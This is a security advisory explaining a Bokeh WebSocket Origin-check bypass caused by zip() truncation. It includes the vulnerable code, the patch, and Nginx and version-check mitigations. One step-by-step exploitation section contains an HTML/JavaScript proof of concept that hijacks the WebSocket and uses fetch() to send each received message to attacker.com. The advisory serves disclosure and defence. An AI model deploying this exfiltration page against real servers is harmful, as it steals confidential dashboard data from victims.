Feb 26, 2026
Bokeh's WebSocket origin validator used Python's `zip()` function, which stops comparing when the shortest list ends. Attackers can register subdomains starting with a trusted name (e.g., `trustedsite.corp.attacker.com`) to trick the server into accepting the connection, leading to full session hijacking.
A logic error in the Bokeh interactive visualization library allows attackers to bypass WebSocket Origin validation. By exploiting Python's `zip()` function behavior, attackers can craft malicious subdomains that mimic trusted origins, enabling Cross-Site WebSocket Hijacking (CSWSH) to exfiltrate data or manipulate server-side state.
Bokeh is the darling of the Python data science world. It takes heavy, server-side computation and spits out beautiful, interactive HTML/JS visualizations. To make those sliders slide and those graphs update in real-time, Bokeh relies heavily on WebSockets. It’s a persistent pipe between the browser and the backend Python process.
But here is the thing about WebSockets: they don't adhere to the Same-Origin Policy (SOP) in the way XHR or Fetch does. A browser will happily open a WebSocket connection to whatever server a page points it at, carrying the user's cookies along for the ride. It is up to the server to look at the `Origin` header and say, "Hey, you're coming from evil.com, get lost."
If that check fails—or in this case, gets a little too lazy—you enter the realm of Cross-Site WebSocket Hijacking (CSWSH). It’s essentially CSRF on steroids. Instead of sending a single blind request (like "buy stock"), the attacker gets a full, two-way communication channel. They can read the response. They can see the data. In the context of Bokeh, that means they can watch your internal dashboard right alongside you.
The root cause of CVE-2026-21883 is a classic case of "it works for valid input, so ship it." The vulnerability lies in src/bokeh/server/util.py, specifically inside a function called match_host. This function is supposed to take the incoming Origin header and compare it against a configured allowlist.
The developers made a fatal assumption about Python's zip() function. For those uninitiated in Pythonic foot-guns, zip(a, b) takes two lists and iterates over them together. Crucially, it stops as soon as the shortest list is exhausted. It doesn't throw an error; it doesn't warn you. It just quietly packs up and goes home.
Imagine you have an allowlist containing dashboard.corp. You split that into ['dashboard', 'corp']. Now imagine an attacker comes along with dashboard.corp.evil.net. Split that, and you get ['dashboard', 'corp', 'evil', 'net']. When you zip() them, the loop runs twice. 'dashboard' matches 'dashboard'. 'corp' matches 'corp'. The loop finishes. The code hits return True. The server opens the door wide.
Let's look at the crime scene. The match_host function was trying to be clever by splitting hostnames by periods to handle subdomains and wildcards. Here is the logic that doomed it:
```python
# The Vulnerable Logic
def match_host(host: str, pattern: str) -> bool:
    host_parts = host.split('.')
    pattern_parts = pattern.split('.')

    # They checked if the pattern was longer than the host...
    if len(pattern_parts) > len(host_parts):
        return False

    # ...but forgot to check if the HOST was longer than the PATTERN.
    for h, p in zip(host_parts, pattern_parts):
        if h == p or p == '*':
            continue
        else:
            return False
    return True
```

See the gap? If `host_parts` is longer than `pattern_parts`, `zip` just ignores the extra parts (the `.evil.net` part). The code assumes that if it survived the loop, it's a match.
The fix (Commit cedd113) is almost comically simple. It enforces that the lengths must match exactly (unless wildcards are involved, which are handled separately).
```diff
# The Fix
-    if len(pattern_parts) > len(host_parts):
-        return False
+    if len(pattern_parts) != len(host_parts):
+        return False
```

This single-operator change (`>` to `!=`) closes the vulnerability completely. It forces the validation to acknowledge the entire hostname provided by the client.
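To see the difference the operator makes, here is a small side-by-side sketch. It is based on the simplified listing in this article, not on the full Bokeh source, and the names `match_host_vulnerable` and `match_host_fixed` are made up for illustration.

```python
def match_host_vulnerable(host: str, pattern: str) -> bool:
    """Simplified pre-patch logic: only rejects hosts SHORTER than the pattern."""
    host_parts = host.split(".")
    pattern_parts = pattern.split(".")
    if len(pattern_parts) > len(host_parts):
        return False
    # zip() stops at the shorter list, so extra host labels are never checked.
    for h, p in zip(host_parts, pattern_parts):
        if h != p and p != "*":
            return False
    return True


def match_host_fixed(host: str, pattern: str) -> bool:
    """Simplified post-patch logic: label counts must be equal before comparing."""
    host_parts = host.split(".")
    pattern_parts = pattern.split(".")
    if len(pattern_parts) != len(host_parts):
        return False
    # Both lists now have the same length, so zip() covers every label.
    for h, p in zip(host_parts, pattern_parts):
        if h != p and p != "*":
            return False
    return True


attacker_host = "dashboard.corp.evil.net"  # hypothetical attacker-controlled name
print(match_host_vulnerable(attacker_host, "dashboard.corp"))  # True
print(match_host_fixed(attacker_host, "dashboard.corp"))       # False
print(match_host_fixed("dashboard.corp", "dashboard.corp"))    # True
print(match_host_fixed("dashboard.corp", "*.corp"))            # True
```

In this sketch a `*` matches exactly one label, which is the behavior the listing implies; the real function may treat wildcards differently.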
Exploiting this requires a bit of setup, but it is highly realistic in corporate environments where internal DNS names are predictable. Let's assume a target organization runs a Bokeh server at ws://analytics.internal.corp.
Step 1: Reconnaissance
The attacker needs to know the allowlist. Often, this is the FQDN of the server itself. If the server expects analytics.internal.corp, that is our target string.
Step 2: Infrastructure
The attacker registers a domain or configures a subdomain they control to start with the target string. For example, they register attacker.com and create a subdomain: analytics.internal.corp.attacker.com.
Step 3: The Trap
The attacker hosts a simple HTML page on analytics.internal.corp.attacker.com:
```html
<!-- Hosted on attacker's domain -->
<script>
  // Browser sends Origin: http://analytics.internal.corp.attacker.com
  var ws = new WebSocket("ws://analytics.internal.corp/ws");

  ws.onopen = function() {
    console.log("We are in.");
  };

  ws.onmessage = function(msg) {
    // Exfiltrate sensitive dashboard data to attacker server
    fetch("https://attacker.com/log", { method: "POST", body: msg.data });
  };
</script>
```

Step 4: Execution
The attacker sends the link to a victim who has access to the internal analytics dashboard. When the victim clicks, the WebSocket handshake initiates. The browser sends the attacker's domain as the Origin. The Bokeh server, blinded by the zip() flaw, sees analytics.internal.corp... and approves the connection. The attacker now receives a live feed of the victim's data.
You might think, "So what? They see a scatter plot." But Bokeh is an interactive library. The communication channel handles events. If the dashboard has widgets—buttons that trigger database refreshes, sliders that adjust parameters, or text inputs that run queries—the attacker can trigger those too.
Because WebSockets are bidirectional, the attacker can send messages to the server as if they were the user. In a worst-case scenario where the dashboard allows executing SQL queries or Python code based on input (which is bad design, but we see it constantly), this becomes Remote Code Execution (RCE) or SQL Injection via WebSocket.
Even without RCE, the confidentiality loss is massive. These dashboards often display proprietary trading data, patient health metrics, or infrastructure status. Bypassing the Origin check effectively bypasses the firewall for the application layer.
If you are running Bokeh <= 3.8.1, you are vulnerable. The primary fix is to upgrade to 3.8.2 or later immediately. The patch is small and safe to backport if you are stuck on a legacy version.
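For a quick inventory check, something like the following sketch can flag affected installs. It assumes the version boundary stated above (fixed in 3.8.2), compares only the leading numeric components, and uses the hypothetical helper names `parse_release` and `is_affected`; pre-release suffixes such as `rc1` are ignored, so treat borderline results with care.

```python
import re
from typing import Tuple

# First patched release according to this advisory.
FIXED_VERSION = (3, 8, 2)


def parse_release(version: str) -> Tuple[int, ...]:
    """Return the leading numeric components, e.g. '3.8.1' -> (3, 8, 1)."""
    match = re.match(r"\d+(?:\.\d+)*", version)
    if match is None:
        raise ValueError(f"unrecognized version string: {version!r}")
    return tuple(int(part) for part in match.group().split("."))


def is_affected(version: str) -> bool:
    """True if the release number sorts before the first patched release."""
    return parse_release(version) < FIXED_VERSION


print(is_affected("3.8.1"))  # True
print(is_affected("3.8.2"))  # False
print(is_affected("3.4.0"))  # True

# In a live environment the installed version could be passed in, e.g.:
#   import bokeh
#   is_affected(bokeh.__version__)
```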
However, relying solely on application-level checks is playing with fire. You should enforce Origin validation at your ingress point—your reverse proxy.
If you use Nginx, an anchored match on the full origin is your friend:

```nginx
location /ws {
    proxy_pass http://backend;
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";

    # Strict check: the pattern is anchored at both ends, so nothing may follow the trusted host.
    if ($http_origin !~* "^https?://(analytics\.internal\.corp)$") {
        return 403;
    }
}
```

By killing the request at the Nginx layer, the vulnerable Python code never even executes. Defense in depth means never trusting a `zip()` loop with your perimeter security.
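Before deploying a rule like this, it is worth checking the pattern against a few sample origins. The sketch below replays the same regular expression with Python's `re` module, on the assumption that this simple pattern behaves the same under Nginx's PCRE engine; `origin_allowed` is a hypothetical helper, not part of Nginx or Bokeh.

```python
import re

# Same pattern as the Nginx rule; re.IGNORECASE mirrors the case-insensitive "!~*".
ORIGIN_RE = re.compile(r"^https?://(analytics\.internal\.corp)$", re.IGNORECASE)


def origin_allowed(origin: str) -> bool:
    """True if the Origin header value would pass the anchored allowlist pattern."""
    return ORIGIN_RE.search(origin) is not None


samples = [
    "http://analytics.internal.corp",               # trusted origin
    "https://analytics.internal.corp",              # trusted origin over TLS
    "http://analytics.internal.corp.attacker.com",  # the bypass from this article
    "http://analytics.internal.corp:5006",          # trusted host, explicit port
    "",                                             # header missing or empty
]
for origin in samples:
    print(repr(origin), origin_allowed(origin))
```

Only the first two samples pass. Note that the origin with an explicit port is rejected as well: browsers include a non-default port in the `Origin` header, so a dashboard served on such a port would need the port added to the pattern.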
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:U

| Product | Affected Versions | Fixed Version |
|---|---|---|
| Bokeh (Bokeh Project) | <= 3.8.1 | 3.8.2 |

| Attribute | Detail |
|---|---|
| CWE ID | CWE-1385 |
| Attack Vector | Network |
| CVSS Score | 4.5 (Medium) |
| Impact | Data Exfiltration / Session Hijacking |
| Root Cause | Logic Error in List Iteration |
| Patch Status | Available (v3.8.2) |
The application does not verify or incorrectly verifies the Origin header of a WebSocket connection, allowing an attacker to establish a connection from an unauthorized origin.